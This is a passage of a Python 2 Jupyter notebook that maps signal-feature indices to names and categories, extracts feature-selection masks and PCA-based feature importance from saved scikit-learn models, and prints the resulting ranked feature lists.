"############ Prepare the indeces for each feature ############\ndef get_feat_id(feat_ind, printit=0, sample_window=window): \n \"\"\"Find the corresponding indeces of the desired features inside feature vector,\n and link them with their names and level of abstraction\n -> feat_ind : range of indeces\n -> printit : print output indeces (1) or not (0)\n -> sample_window : parameter for accurate computation of feature indeces\n <- full_path_id : indeces of all features\n <- norm_time_feats : indeces of time features\n <- norm_freq_feats : indeces of frequency features\n \"\"\"\n # get the feat inds wrt their source : 3rd level\n norm_time_phin = range(0,14)\n norm_freq_phin = range(norm_time_phin[-1] + 1, norm_time_phin[-1] + 9 + sample_window + 1)\n norm_time_golz = range(norm_freq_phin[-1] + 1, norm_freq_phin[-1] + 10 + sample_window + 1)\n norm_freq_golz = range(norm_time_golz[-1] + 1, norm_time_golz[-1] + 2 + sample_window + 1)\n # get the feat inds wrt their domain : 2nd level \n norm_time_feats = norm_time_phin + norm_time_golz\n norm_freq_feats = norm_freq_phin + norm_freq_golz\n # get the feat inds wrt their prefeat: 1st level \n norm_feats = norm_time_feats + norm_freq_feats\n\n # get the feat inds wrt their source : 3rd level\n disp = norm_feats[-1]+1\n ftfn_time_phin = range(disp ,disp + 14)\n ftfn_freq_phin = range(ftfn_time_phin[-1] + 1, ftfn_time_phin[-1] + 9 + sample_window + 1)\n ftfn_time_golz = range(ftfn_freq_phin[-1] + 1, ftfn_freq_phin[-1] + 10 + sample_window + 1)\n ftfn_freq_golz = range(ftfn_time_golz[-1] + 1, ftfn_time_golz[-1] + 2 + sample_window + 1)\n # get the feat inds wrt their domain : 2nd level \n ftfn_time_feats = ftfn_time_phin + ftfn_time_golz\n ftfn_freq_feats = ftfn_freq_phin + ftfn_freq_golz\n # get the feat inds wrt their prefeat: 1st level \n ftfn_feats = ftfn_time_feats + ftfn_freq_feats\n\n # create the final \"reference dictionary\"\n # 3 np.arrays, id_list[0] = level 1 etc\n id_list = [np.zeros((len(ftfn_feats + norm_feats),1)) for i in range(3)]\n id_list[0][:norm_feats[-1]+1] = 0 # 0 signifies norm / 1 signifies ft/fn\n id_list[0][norm_feats[-1]+1:] = 1\n\n id_list[1][:norm_time_phin[-1]+1] = 0 # 0 signifies time / 1 signifies freq\n id_list[1][norm_time_phin[-1]+1:norm_freq_phin[-1]+1] = 1\n id_list[1][norm_freq_phin[-1]+1:norm_time_golz[-1]+1] = 0\n id_list[1][norm_time_golz[-1]+1:norm_freq_golz[-1]+1] = 1\n id_list[1][norm_freq_golz[-1]+1:ftfn_time_phin[-1]+1] = 0\n id_list[1][ftfn_time_phin[-1]+1:ftfn_freq_phin[-1]+1] = 1\n id_list[1][ftfn_freq_phin[-1]+1:ftfn_time_golz[-1]+1] = 0\n id_list[1][ftfn_time_golz[-1]+1:] = 1\n\n id_list[2][:norm_freq_phin[-1]+1] = 0 #0 signifies phinyomark / 1 signifies golz\n id_list[2][norm_freq_phin[-1]+1:norm_freq_golz[-1]+1] = 1\n id_list[2][norm_freq_golz[-1]+1:ftfn_freq_phin[-1]+1] = 0\n id_list[2][ftfn_freq_phin[-1]+1:] = 1 \n \n full_path_id = [np.zeros((len(feat_ind),5)) for i in range(len(feat_ind))]\n \n for ind, val in enumerate(feat_ind):\n full_path_id[ind] = [val, id_list[2][val], id_list[1][val], id_list[0][val]]\n if (printit==1):\n if(full_path_id[ind][1]==0):\n lvl3 = 'Phin'\n else:\n lvl3 = 'Golz'\n if(full_path_id[ind][2]==0):\n lvl2 = 'Time'\n else:\n lvl2 = 'Freq'\n if(full_path_id[ind][3]==0):\n lvl1 = 'Norm'\n else:\n lvl1 = 'Ft/Fn'\n print(feat_ind[ind],featnames[val%(norm_feats[-1]+1)],lvl3,lvl2,lvl1)\n \n return(full_path_id,norm_time_feats,norm_freq_feats) ",
"_____no_output_____"
],
[
"def subfeat_inds(ofs=len(featnames)):\n \"\"\"returns a subfeatures' indeces\n -> ofs : number of features in total\n <- amfft, freq, time, both : split featureset indeces for \n amplitude of FFT, all time only,\n all frequency only and all features\n \"\"\"\n _,time,freq = get_feat_id(range(ofs))\n both = range(ofs)\n amfft = []\n for i in range(len(featnames)):\n if (featnames[i].startswith('amFFT')):\n amfft.append(i)\n return amfft, freq, time, both",
"_____no_output_____"
],
[
"def get_tot_feats(fs, subfs, r):\n ###############################################################################################################\n # Version 2, using the bool masks and keeping an array of 6x3000 feats \n ###############################################################################################################\n # If checking for FnormAll, you end up with 36 models of (trained_on, tested_on) combinations but TECHNICALLY\n # the features are the same for every trained_on \"sixplet\" so there's no need to iterate over all the tested_on\n # indeces. Therefore, ts = 2 is chosen arbitrarily \n \n# filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")\n filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_tr_\" + str(0) + \"_ts_\" + str(5) + \".npz\")\n print filenames\n # the features kept for surface i will be stored in bool_tot_feats[i] (final size: 6x1000)\n bool_tot_feats = []\n best_tot_feats = []\n best_tot_scores = []\n \n for filn in filenames:\n # for every training surface \n model_file = np.load(filn)\n model = model_file['model']\n #keep a list of the 1000 features kept\n model_feat_scores = model[0].named_steps['feature_selection'].scores_\n bool_model_features = list(model[0].named_steps['feature_selection'].get_support(indices = False))\n if subfs<=2:\n bool_model_features = np.logical_not(np.array(bool_model_features))\n bool_model_features[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()] = True\n bool_model_features = bool_model_features.tolist()\n# plt.plot(model_feat_scores)\n bool_tot_feats.append(bool_model_features)\n best_tot_scores.append(np.array(model_feat_scores[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()]))\n best_tot_feats.append(np.array(model_feat_scores).argsort()[-1000:][::-1])\n \n return bool_tot_feats, best_tot_feats, best_tot_scores",
"_____no_output_____"
],
[
"def get_tot_feats_importance_pca(fs, subfs, r):\n ###############################################################################################################\n # Version 2, using the bool masks and keeping an array of 6x3000 feats \n ###############################################################################################################\n # If checking for FnormAll, you end up with 36 models of (trained_on, tested_on) combinations but TECHNICALLY\n # the features are the same for every trained_on \"sixplet\" so there's no need to iterate over all the tested_on\n # indeces. Therefore, ts = 2 is chosen arbitrarily \n \n# filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")\n filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_tr_\" + str(0) + \"_ts_\" + str(5) + \".npz\")\n print filenames\n # the features kept for surface i will be stored in bool_tot_feats[i] (final size: 6x1000)\n bool_tot_feats = []\n best_tot_feats = []\n best_tot_scores = []\n \n for filn in filenames:\n # for every training surface \n model_file = np.load(filn)\n model = model_file['model'][0]\n #keep a list of the 1000 features kept\n \n model_pca_var = model[0].named_steps['decomp'].explained_variance_\n model_pca_var_rat = model[0].named_steps['decomp'].explained_variance_ratio_\n model_pca_covar = model[0].named_steps['decomp'].get_covariance()\n model_pca_mean = model[0].named_steps['decomp'].mean_\n n_comp = model[0].named_steps['decomp'].n_components_\n comp = model[0].named_steps['decomp'].components_\n print len(model_pca_var), model_pca_var\n print len(model_pca_var_rat), model_pca_var_rat\n print model_pca_covar.shape, model_pca_covar\n # plt.imshow(model_pca_covar)\n print len(model_pca_mean), model_pca_mean\n print n_comp\n print comp.shape, comp\n nfeat = 1000\n feat_importance = np.zeros(nfeat)\n for nc in range(len(comp)):\n feat_importance += comp[nc]*model_pca_var_rat[nc]\n # plt.plot(range(1000),comp[nc]*model_pca_var_rat[nc])\n plt.plot(range(nfeat),feat_importance/nfeat)\n print feat_importance*nfeat\n sort_feat_imp_ind = np.array(feat_importance).argsort()[:][::-1]\n print np.array(featnames)[sort_feat_imp_ind]\n \n \n model_feat_scores = model[0].named_steps['feature_selection'].scores_\n bool_model_features = list(model[0].named_steps['feature_selection'].get_support(indices = False))\n if subfs<=2:\n bool_model_features = np.logical_not(np.array(bool_model_features))\n bool_model_features[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()] = True\n bool_model_features = bool_model_features.tolist()\n# plt.plot(model_feat_scores)\n bool_tot_feats.append(bool_model_features)\n best_tot_scores.append(np.array(model_feat_scores[np.array(model_feat_scores).argsort()[-1000:][::-1].tolist()]))\n best_tot_feats.append(np.array(model_feat_scores).argsort()[-1000:][::-1])\n \n return bool_tot_feats, best_tot_feats, best_tot_scores",
"_____no_output_____"
],
[
"def freq_time_counter(full_names, subfs):\n f_c = 0; t_c = 0\n for i in range(len(full_names)):\n if full_names[i][2] == 1:\n if subfs!=2:\n f_c += 1\n else:\n if subfs>=2:\n t_c += 1\n return (f_c, t_c)",
"_____no_output_____"
],
[
"def get_common_feats(bool_tot_feats, subfs, skip_surf = 6, print_common_feats = 0): \n # skip_surf = 6 by default so you won't skip any surfaces.\n # returns the list of inds for the common feats\n trans_test_bools = []\n\n for i in range(len(bool_tot_feats)):\n if i != skip_surf:\n trans_test_bools.append(bool_tot_feats[i])\n else: \n continue\n \n trans_test_bools = np.transpose(trans_test_bools)\n common_feats = []\n matches = []\n for i in range(len(trans_test_bools)):\n matches.append(np.all(trans_test_bools[i]))\n for ind, val in enumerate(matches):\n if val:\n common_feats.append(ind)\n print(\"===============================================================\") \n print(\"%d common feats, out of %d total\" %(len(common_feats),len(matches)))\n full_names, _, _ = get_feat_id(common_feats, printit = print_common_feats)\n freq_counter, time_counter = freq_time_counter(full_names, subfs)\n print(\"of which, %d (%.2f%%) were Freq features and %d (%.2f%%) were Time features\" %(freq_counter, (float(freq_counter)/len(common_feats))*100, time_counter, (float(time_counter)/len(common_feats))*100 ))\n\n print(\"===============================================================\")\n \n return common_feats, full_names",
"_____no_output_____"
],
[
"def get_inv_pca_feat_imp(r, fs, subfs, commonfeats):\n# filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")\n filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_tr_\" + str(0) + \"_ts_\" + str(5) + \".npz\")\n print filenames\n feat_imp = np.zeros(len(commonfeats))\n for filn in filenames:\n # for every training surface\n model_file = np.load(filn)\n # get the corresponding model\n model = model_file['model'][0]\n # get the pca\n pca = model.named_steps['decomp']\n # get from the inverse pca the importance of each feature\n invpca = pca.inverse_transform(np.eye(20))\n # find the corresponding indexes returned by feature selection step\n model_feat_ind = list(model.named_steps['feature_selection'].get_support(indices = True))\n # use the commonfeats indexes to find the corresponding index inside model_feat_ind to reference invpca\n # and add its importance to feat_imp correctly\n for ci in range(len(commonfeats)):\n curr_ind = model_feat_ind.index(commonfeats[ci])\n feat_imp[ci] += np.mean(invpca[:,curr_ind])\n return feat_imp",
"_____no_output_____"
],
[
"### Example \nfs=0\nsubfs=3\nfor r in range(1,2):\n tot_feats, best_tot_feats, best_tot_scores = get_tot_feats(fs=0, subfs=subfs, r=r)\n common_feats, full_names = get_common_feats(bool_tot_feats=tot_feats, subfs=subfs, skip_surf=6, print_common_feats=0)\n fn = np.array(full_names)\n tmp = fn[:,0].astype(int).tolist()\n print np.array(featnames)[tmp]\n feat_imp = get_inv_pca_feat_imp(r,fs,subfs,common_feats)\n# print feat_imp\n plt.figure(figsize=(20,10))\n feat_imp_sort_ind = np.argsort(feat_imp)[::-1]\n feat_imp_sort = np.sort(feat_imp)[::-1]\n plt.plot(feat_imp_sort)\n for t in range(len(feat_imp_sort_ind)):\n print t, np.array(featnames)[tmp[feat_imp_sort_ind[t]]], feat_imp_sort[t]\n\n# for j in range(0,len(best_tot_feats),1):\n# tmpj = best_tot_feats[j][:5]\n# print len(tmpj)\n# print j, best_tot_scores[j][:10]\n# print j, np.array(featnames)[tmpj]\n ",
"['data/results1/fs_0_subfs_3_tr_0_ts_5.npz']\n===============================================================\n1000 common feats, out of 3107 total\nof which, 44 (4.40%) were Freq features and 956 (95.60%) were Time features\n===============================================================\n['intsgnl' 'meanabs' 'meanabsslp' 'ssi' 'var' 'rms' 'rng' 'mmnf' 'mmdf'\n 'reFFT000' 'reFFT001' 'reFFT002' 'reFFT003' 'reFFT004' 'reFFT005'\n 'reFFT006' 'reFFT007' 'reFFT008' 'reFFT009' 'reFFT010' 'reFFT011'\n 'reFFT012' 'reFFT015' 'reFFT016' 'reFFT017' 'reFFT018' 'imFFT003'\n 'imFFT004' 'imFFT006' 'imFFT008' 'imFFT009' 'imFFT010' 'imFFT011'\n 'imFFT012' 'imFFT021' 'imFFT023' 'imFFT028' 'imFFT029' 'imFFT034' 'meanv'\n 'stdr' 'mx' 'rngy' 'med' 'hjorth' 'se' 'acrol0000' 'acrol0001' 'acrol0002'\n 'acrol0003' 'acrol0004' 'acrol0005' 'acrol0006' 'acrol0007' 'acrol0008'\n 'acrol0009' 'acrol0010' 'acrol0011' 'acrol0012' 'acrol0013' 'acrol0014'\n 'acrol0015' 'acrol0016' 'acrol0017' 'acrol0018' 'acrol0019' 'acrol0020'\n 'acrol0021' 'acrol0022' 'acrol0023' 'acrol0024' 'acrol0025' 'acrol0026'\n 'acrol0027' 'acrol0028' 'acrol0029' 'acrol0030' 'acrol0031' 'acrol0032'\n 'acrol0033' 'acrol0034' 'acrol0035' 'acrol0036' 'acrol0037' 'acrol0038'\n 'acrol0039' 'acrol0040' 'acrol0041' 'acrol0042' 'acrol0043' 'acrol0044'\n 'acrol0045' 'acrol0046' 'acrol0047' 'acrol0048' 'acrol0049' 'acrol0050'\n 'acrol0051' 'acrol0052' 'acrol0053' 'acrol0054' 'acrol0055' 'acrol0056'\n 'acrol0057' 'acrol0058' 'acrol0059' 'acrol0060' 'acrol0061' 'acrol0062'\n 'acrol0063' 'acrol0064' 'acrol0065' 'acrol0066' 'acrol0067' 'acrol0068'\n 'acrol0069' 'acrol0070' 'acrol0071' 'acrol0072' 'acrol0073' 'acrol0074'\n 'acrol0075' 'acrol0076' 'acrol0077' 'acrol0078' 'acrol0079' 'acrol0080'\n 'acrol0081' 'acrol0082' 'acrol0083' 'acrol0084' 'acrol0085' 'acrol0086'\n 'acrol0087' 'acrol0088' 'acrol0089' 'acrol0090' 'acrol0091' 'acrol0092'\n 'acrol0093' 'acrol0094' 'acrol0095' 'acrol0096' 'acrol0097' 'acrol0098'\n 'acrol0099' 'acrol0100' 'acrol0101' 'acrol0102' 'acrol0103' 'acrol0104'\n 'acrol0105' 'acrol0106' 'acrol0107' 'acrol0108' 'acrol0109' 'acrol0110'\n 'acrol0111' 'acrol0112' 'acrol0113' 'acrol0114' 'acrol0115' 'acrol0116'\n 'acrol0117' 'acrol0118' 'acrol0119' 'acrol0120' 'acrol0121' 'acrol0122'\n 'acrol0123' 'acrol0124' 'acrol0125' 'acrol0126' 'acrol0127' 'acrol0128'\n 'acrol0129' 'acrol0130' 'acrol0131' 'acrol0132' 'acrol0133' 'acrol0134'\n 'acrol0135' 'acrol0136' 'acrol0137' 'acrol0138' 'acrol0139' 'acrol0140'\n 'acrol0141' 'acrol0142' 'acrol0143' 'acrol0144' 'acrol0145' 'acrol0146'\n 'acrol0147' 'acrol0148' 'acrol0149' 'acrol0150' 'acrol0151' 'acrol0152'\n 'acrol0153' 'acrol0154' 'acrol0155' 'acrol0156' 'acrol0157' 'acrol0158'\n 'acrol0159' 'acrol0160' 'acrol0161' 'acrol0162' 'acrol0163' 'acrol0164'\n 'acrol0165' 'acrol0166' 'acrol0167' 'acrol0168' 'acrol0169' 'acrol0170'\n 'acrol0171' 'acrol0172' 'acrol0173' 'acrol0174' 'acrol0175' 'acrol0176'\n 'acrol0177' 'acrol0178' 'acrol0179' 'acrol0180' 'acrol0181' 'acrol0182'\n 'acrol0183' 'acrol0184' 'acrol0185' 'acrol0186' 'acrol0187' 'acrol0188'\n 'acrol0189' 'acrol0190' 'acrol0194' 'acrol0195' 'acrol0196' 'acrol0197'\n 'acrol0198' 'acrol0199' 'acrol0200' 'acrol0201' 'acrol0202' 'acrol0203'\n 'acrol0204' 'acrol0205' 'acrol0206' 'acrol0208' 'acrol0209' 'acrol0213'\n 'acrol0214' 'acrol0215' 'acrol0216' 'acrol0217' 'acrol0218' 'acrol0220'\n 'acrol0221' 'acrol0223' 'acrol0224' 'acrol0227' 'acrol0228' 'acrol0229'\n 'acrol0230' 'acrol0231' 'acrol0232' 'acrol0233' 'acrol0234' 'acrol0235'\n 'acrol0236' 'acrol0237' 'acrol0238' 'acrol0239' 'acrol0240' 'acrol0241'\n 'acrol0242' 'acrol0243' 'acrol0244' 'acrol0245' 'acrol0246' 'acrol0247'\n 'acrol0248' 'acrol0249' 'acrol0250' 'acrol0251' 'acrol0252' 'acrol0253'\n 'acrol0254' 'acrol0255' 'acrol0256' 'acrol0257' 'acrol0258' 'acrol0259'\n 'acrol0260' 'acrol0261' 'acrol0262' 'acrol0263' 'acrol0264' 'acrol0265'\n 'acrol0266' 'acrol0267' 'acrol0268' 'acrol0269' 'acrol0270' 'acrol0271'\n 'acrol0272' 'acrol0273' 'acrol0274' 'acrol0275' 'acrol0276' 'acrol0277'\n 'acrol0278' 'acrol0279' 'acrol0280' 'acrol0281' 'acrol0282' 'acrol0283'\n 'acrol0284' 'acrol0285' 'acrol0286' 'acrol0287' 'acrol0288' 'acrol0289'\n 'acrol0290' 'acrol0291' 'acrol0292' 'acrol0293' 'acrol0294' 'acrol0295'\n 'acrol0296' 'acrol0297' 'acrol0298' 'acrol0299' 'acrol0300' 'acrol0301'\n 'acrol0302' 'acrol0303' 'acrol0304' 'acrol0305' 'acrol0306' 'acrol0307'\n 'acrol0308' 'acrol0309' 'acrol0310' 'acrol0311' 'acrol0312' 'acrol0313'\n 'acrol0314' 'acrol0315' 'acrol0316' 'acrol0317' 'acrol0318' 'acrol0319'\n 'acrol0320' 'acrol0321' 'acrol0322' 'acrol0323' 'acrol0324' 'acrol0325'\n 'acrol0326' 'acrol0327' 'acrol0328' 'acrol0329' 'acrol0330' 'acrol0331'\n 'acrol0332' 'acrol0333' 'acrol0334' 'acrol0335' 'acrol0336' 'acrol0337'\n 'acrol0338' 'acrol0339' 'acrol0340' 'acrol0341' 'acrol0342' 'acrol0343'\n 'acrol0344' 'acrol0345' 'acrol0346' 'acrol0347' 'acrol0348' 'acrol0349'\n 'acrol0350' 'acrol0351' 'acrol0352' 'acrol0353' 'acrol0354' 'acrol0355'\n 'acrol0356' 'acrol0357' 'acrol0358' 'acrol0359' 'acrol0360' 'acrol0361'\n 'acrol0362' 'acrol0363' 'acrol0364' 'acrol0365' 'acrol0366' 'acrol0367'\n 'acrol0368' 'acrol0369' 'acrol0370' 'acrol0371' 'acrol0372' 'acrol0373'\n 'acrol0374' 'acrol0375' 'acrol0376' 'acrol0377' 'acrol0378' 'acrol0379'\n 'acrol0380' 'acrol0381' 'acrol0382' 'acrol0383' 'acrol0384' 'acrol0385'\n 'acrol0386' 'acrol0387' 'acrol0388' 'acrol0389' 'acrol0390' 'acrol0391'\n 'acrol0392' 'acrol0393' 'acrol0394' 'acrol0395' 'acrol0396' 'acrol0397'\n 'acrol0398' 'acrol0399' 'acrol0400' 'acrol0401' 'acrol0402' 'acrol0403'\n 'acrol0404' 'acrol0405' 'acrol0406' 'acrol0407' 'acrol0408' 'acrol0409'\n 'acrol0410' 'acrol0411' 'acrol0412' 'acrol0413' 'acrol0414' 'acrol0415'\n 'acrol0416' 'acrol0417' 'acrol0418' 'acrol0419' 'acrol0420' 'acrol0421'\n 'acrol0422' 'acrol0423' 'acrol0424' 'acrol0425' 'acrol0426' 'acrol0427'\n 'acrol0428' 'acrol0429' 'acrol0430' 'acrol0431' 'acrol0432' 'acrol0433'\n 'acrol0434' 'acrol0435' 'acrol0436' 'acrol0437' 'acrol0438' 'acrol0439'\n 'acrol0440' 'acrol0441' 'acrol0442' 'acrol0443' 'acrol0444' 'acrol0445'\n 'acrol0446' 'acrol0447' 'acrol0448' 'acrol0449' 'acrol0450' 'acrol0451'\n 'acrol0452' 'acrol0453' 'acrol0454' 'acrol0455' 'acrol0458' 'acrol0459'\n 'acrol0460' 'acrol0461' 'acrol0462' 'acrol0463' 'acrol0464' 'acrol0465'\n 'acrol0466' 'acrol0467' 'acrol0468' 'acrol0469' 'acrol0470' 'acrol0471'\n 'acrol0472' 'acrol0473' 'acrol0474' 'acrol0475' 'acrol0476' 'acrol0477'\n 'acrol0478' 'acrol0479' 'acrol0480' 'acrol0481' 'acrol0482' 'acrol0483'\n 'acrol0484' 'acrol0485' 'acrol0486' 'acrol0487' 'acrol0488' 'acrol0489'\n 'acrol0490' 'acrol0491' 'acrol0492' 'acrol0493' 'acrol0494' 'acrol0495'\n 'acrol0496' 'acrol0497' 'acrol0498' 'acrol0499' 'acrol0500' 'acrol0501'\n 'acrol0502' 'acrol0503' 'acrol0504' 'acrol0505' 'acrol0506' 'acrol0507'\n 'acrol0508' 'acrol0509' 'acrol0510' 'acrol0511' 'acrol0512' 'acrol0513'\n 'acrol0514' 'acrol0515' 'acrol0516' 'acrol0517' 'acrol0518' 'acrol0519'\n 'acrol0520' 'acrol0521' 'acrol0522' 'acrol0523' 'acrol0524' 'acrol0525'\n 'acrol0526' 'acrol0527' 'acrol0528' 'acrol0529' 'acrol0530' 'acrol0531'\n 'acrol0532' 'acrol0533' 'acrol0534' 'acrol0535' 'acrol0536' 'acrol0537'\n 'acrol0538' 'acrol0539' 'acrol0540' 'acrol0541' 'acrol0542' 'acrol0543'\n 'acrol0544' 'acrol0545' 'acrol0546' 'acrol0547' 'acrol0548' 'acrol0549'\n 'acrol0550' 'acrol0551' 'acrol0552' 'acrol0553' 'acrol0554' 'acrol0555'\n 'acrol0556' 'acrol0557' 'acrol0558' 'acrol0559' 'acrol0560' 'acrol0561'\n 'acrol0562' 'acrol0563' 'acrol0564' 'acrol0565' 'acrol0566' 'acrol0567'\n 'acrol0568' 'acrol0569' 'acrol0570' 'acrol0571' 'acrol0572' 'acrol0573'\n 'acrol0574' 'acrol0575' 'acrol0576' 'acrol0577' 'acrol0578' 'acrol0579'\n 'acrol0580' 'acrol0581' 'acrol0582' 'acrol0583' 'acrol0584' 'acrol0585'\n 'acrol0586' 'acrol0587' 'acrol0588' 'acrol0589' 'acrol0590' 'acrol0591'\n 'acrol0592' 'acrol0593' 'acrol0594' 'acrol0595' 'acrol0596' 'acrol0597'\n 'acrol0598' 'acrol0599' 'acrol0600' 'acrol0601' 'acrol0602' 'acrol0603'\n 'acrol0604' 'acrol0605' 'acrol0606' 'acrol0607' 'acrol0608' 'acrol0609'\n 'acrol0610' 'acrol0611' 'acrol0612' 'acrol0613' 'acrol0614' 'acrol0615'\n 'acrol0616' 'acrol0617' 'acrol0618' 'acrol0619' 'acrol0620' 'acrol0621'\n 'acrol0622' 'acrol0623' 'acrol0624' 'acrol0625' 'acrol0626' 'acrol0627'\n 'acrol0628' 'acrol0629' 'acrol0630' 'acrol0631' 'acrol0632' 'acrol0633'\n 'acrol0634' 'acrol0635' 'acrol0636' 'acrol0637' 'acrol0638' 'acrol0639'\n 'acrol0640' 'acrol0641' 'acrol0642' 'acrol0643' 'acrol0644' 'acrol0645'\n 'acrol0646' 'acrol0647' 'acrol0648' 'acrol0649' 'acrol0650' 'acrol0651'\n 'acrol0652' 'acrol0653' 'acrol0654' 'acrol0655' 'acrol0656' 'acrol0657'\n 'acrol0658' 'acrol0659' 'acrol0660' 'acrol0661' 'acrol0662' 'acrol0663'\n 'acrol0664' 'acrol0665' 'acrol0666' 'acrol0667' 'acrol0668' 'acrol0669'\n 'acrol0670' 'acrol0671' 'acrol0672' 'acrol0673' 'acrol0674' 'acrol0675'\n 'acrol0676' 'acrol0677' 'acrol0678' 'acrol0679' 'acrol0680' 'acrol0681'\n 'acrol0682' 'acrol0683' 'acrol0684' 'acrol0685' 'acrol0686' 'acrol0687'\n 'acrol0688' 'acrol0689' 'acrol0690' 'acrol0691' 'acrol0692' 'acrol0693'\n 'acrol0694' 'acrol0695' 'acrol0696' 'acrol0697' 'acrol0698' 'acrol0699'\n 'acrol0700' 'acrol0701' 'acrol0702' 'acrol0703' 'acrol0704' 'acrol0705'\n 'acrol0706' 'acrol0707' 'acrol0708' 'acrol0709' 'acrol0710' 'acrol0711'\n 'acrol0712' 'acrol0713' 'acrol0714' 'acrol0715' 'acrol0716' 'acrol0717'\n 'acrol0718' 'acrol0719' 'acrol0720' 'acrol0721' 'acrol0722' 'acrol0723'\n 'acrol0724' 'acrol0725' 'acrol0726' 'acrol0727' 'acrol0728' 'acrol0729'\n 'acrol0730' 'acrol0731' 'acrol0732' 'acrol0733' 'acrol0734' 'acrol0735'\n 'acrol0736' 'acrol0737' 'acrol0738' 'acrol0739' 'acrol0740' 'acrol0741'\n 'acrol0742' 'acrol0743' 'acrol0744' 'acrol0745' 'acrol0746' 'acrol0747'\n 'acrol0748' 'acrol0749' 'acrol0750' 'acrol0751' 'acrol0752' 'acrol0753'\n 'acrol0754' 'acrol0755' 'acrol0756' 'acrol0757' 'acrol0758' 'acrol0759'\n 'acrol0760' 'acrol0761' 'acrol0762' 'acrol0763' 'acrol0764' 'acrol0765'\n 'acrol0766' 'acrol0768' 'acrol0769' 'acrol0780' 'acrol0785' 'acrol0786'\n 'acrol0787' 'acrol0788' 'acrol0789' 'acrol0790' 'acrol0791' 'acrol0792'\n 'acrol0793' 'acrol0794' 'acrol0795' 'acrol0796' 'acrol0797' 'acrol0798'\n 'acrol0799' 'acrol0800' 'acrol0801' 'acrol0802' 'acrol0803' 'acrol0804'\n 'acrol0805' 'acrol0806' 'acrol0807' 'acrol0809' 'acrol0811' 'acrol0812'\n 'acrol0813' 'acrol0814' 'acrol0815' 'acrol0816' 'acrol0817' 'acrol0818'\n 'acrol0819' 'acrol0820' 'acrol0821' 'acrol0822' 'acrol0823' 'acrol0824'\n 'acrol0825' 'acrol0826' 'acrol0827' 'acrol0828' 'acrol0829' 'acrol0830'\n 'acrol0831' 'acrol0832' 'acrol0833' 'acrol0834' 'acrol0835' 'acrol0836'\n 'acrol0837' 'acrol0839' 'acrol0840' 'acrol0842' 'acrol0843' 'acrol0844'\n 'acrol0845' 'acrol0846' 'acrol0847' 'acrol0848' 'acrol0849' 'acrol0850'\n 'acrol0851' 'acrol0852' 'acrol0853' 'acrol0854' 'acrol0855' 'acrol0856'\n 'acrol0857' 'acrol0858' 'acrol0859' 'acrol0860' 'acrol0861' 'acrol0862'\n 'acrol0863' 'acrol0864' 'acrol0865' 'acrol0866' 'acrol0867' 'acrol0868'\n 'acrol0869' 'acrol0870' 'acrol0871' 'acrol0872' 'acrol0873' 'acrol0874'\n 'acrol0875' 'acrol0876' 'acrol0877' 'acrol0878' 'acrol0879' 'acrol0880'\n 'acrol0881' 'acrol0882' 'acrol0883' 'acrol0884' 'acrol0885' 'acrol0886'\n 'acrol0887' 'acrol0888' 'acrol0889' 'acrol0890' 'acrol0891' 'acrol0892'\n 'acrol0893' 'acrol0894' 'acrol0895' 'acrol0896' 'acrol0897' 'acrol0898'\n 'acrol0899' 'acrol0900' 'acrol0902' 'acrol0903' 'acrol0905' 'acrol0906'\n 'acrol0907' 'acrol0908' 'acrol0909' 'acrol0910' 'acrol0911' 'acrol0912'\n 'acrol0913' 'acrol0914' 'acrol0915' 'acrol0916' 'acrol0917' 'acrol0918'\n 'acrol0920' 'acrol0922' 'acrol0926' 'acrol0927' 'acrol0928' 'acrol0929'\n 'acrol0930' 'acrol0931' 'acrol0932' 'acrol0933' 'acrol0934' 'acrol0935'\n 'acrol0936' 'acrol0937' 'acrol0938' 'acrol0939' 'acrol0940' 'acrol0941'\n 'acrol0942' 'acrol0943' 'acrol0944' 'acrol0945' 'acrol0946' 'acrol0947'\n 'acrol0948' 'acrol0949' 'acrol0950' 'acrol0951' 'acrol0952' 'acrol0953'\n 'acrol0954' 'acrol0955' 'acrol0956' 'acrol0957' 'acrol0958' 'acrol0959'\n 'acrol0960' 'acrol0961' 'acrol0962' 'acrol0963' 'acrol0964' 'acrol0965'\n 'acrol0966' 'acrol0967' 'acrol0968' 'acrol0969' 'acrol0970' 'acrol0971'\n 'acrol0972' 'acrol0973' 'acrol0974' 'acrol0975' 'acrol0976' 'acrol0977'\n 'acrol0978' 'acrol1020' 'acrol1021' 'amFFT000' 'amFFT008' 'amFFT009'\n 'amFFT010' 'amFFT011' 'amFFT012' 'phFFT000' 'phFFT008' 'phFFT009'\n 'phFFT010' 'phFFT011' 'phFFT012']\n['data/results1/fs_0_subfs_3_tr_0_ts_5.npz']\n0 reFFT010 0.0766293408706\n1 reFFT018 0.0447414833478\n2 reFFT004 0.0435756307039\n3 mmdf 0.0427619960262\n4 phFFT012 0.0409017707002\n5 mmnf 0.0398151146058\n6 phFFT009 0.0391392334455\n7 phFFT011 0.037165513411\n8 phFFT010 0.0342619814778\n9 phFFT008 0.0341353010342\n10 reFFT017 0.0308057578195\n11 amFFT012 0.0304204922638\n12 stdr 0.0292270519868\n13 reFFT009 0.0240039463317\n14 amFFT009 0.0221175965759\n15 rng 0.022048362632\n16 rngy 0.022048362632\n17 hjorth 0.0219253534307\n18 amFFT011 0.0198409229263\n19 reFFT015 0.0187915593818\n20 amFFT010 0.0182735340709\n21 amFFT008 0.0175001756734\n22 reFFT016 0.0165941225547\n23 reFFT002 0.00653771301826\n24 acrol0032 0.00340014577388\n25 acrol0031 0.00340013319156\n26 acrol0033 0.00340006155269\n27 acrol0030 0.00340001154337\n28 acrol0034 0.00339986928283\n29 acrol0029 0.00339986311755\n30 acrol0028 0.00339962581376\n31 acrol0035 0.00339961364424\n32 acrol0027 0.00339932175299\n33 acrol0036 0.00339927996672\n34 acrol0026 0.00339890435312\n35 acrol0037 0.00339886889514\n36 acrol0025 0.00339844385987\n37 acrol0038 